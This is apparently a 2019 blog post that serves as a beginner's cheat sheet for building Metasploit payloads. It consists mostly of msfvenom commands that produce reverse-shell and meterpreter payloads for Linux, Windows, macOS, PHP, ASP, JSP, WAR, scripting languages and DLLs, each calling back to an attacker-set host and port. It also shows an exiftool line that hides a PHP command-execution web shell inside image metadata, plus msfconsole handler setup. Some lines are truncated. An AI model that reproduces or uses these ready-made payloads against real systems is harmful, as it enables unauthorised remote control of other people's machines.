Information Technology | Softwares - Graphics - Programming - Hacking - Security

Mar 12, 2019

Create Metasploit Payload for Beginner - Metasploit Basic

Multiple payloads can be created with modules and it helps something that can give you a shell in almost any situation.
For each of these payloads we need go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options: LHOST, LPORT,....

Start database:
$ msfdb init
$ service postgresql start

List Available Payloads:
$ msfvenom -l

Binaries Payloads:
1. Linux
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f elf > shell.elf
2. Windows
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f exe > shell.exe
3. Mac
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f macho > shell.macho

Web Payloads:

1. PHP
$ msfvenom -p php/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-LOCAL-PORT" -e php/base64 R > shell.php
2. ASP
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f asp > shell.asp
3. JSP
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw > shell.jsp
4. War
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f war > shell.war

Scripting Payloads

1. Python

$ msfvenom -p cmd/unix/reverse_python LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw >

2. Bash

$ msfvenom -p cmd/unix/reverse_bash LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw >
$ msfvenom -p cmd/unix/reverse_perl LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f raw >
4. Image
$ exiftool -DocumentName="<h1>Laladee<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" image.jpeg
5. Dll
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST="YOUR-IP-ADDRESS" LPORT="YOUR-PORT" -f dll > privesc.dll

Create Handlers

$ msfconsole
$ msf > use exploit/multi/handler
$ msf exploit(multi/handler) > set LHOST <host>
$ msf exploit(multi/handler) > set LPORT <port>
$ msf exploit(multi/handler) > set PAYLOAD <payload>
$ msf exploit(multi/handler) > set ExitOnSession false
$ msf exploit(multi/handler) > exploit -j -z

Load Custom Payloads

Metasploit allow you to generate Payload and use it during an attack. To use this function, simply generate your Payload before to run your attack and once you are done, use “payload/generic/custom” to specify the Payload to use.
$ msfconsole
$ msf > use  payload/generic/custom
$ msf payload(custom) > show options
$ msf payload(custom) > set PAYLOADFILE /path/to/the/payload
$ msf payload(custom) > set PAYLOADSTR the_payload_string_to_use

Read more:


About Us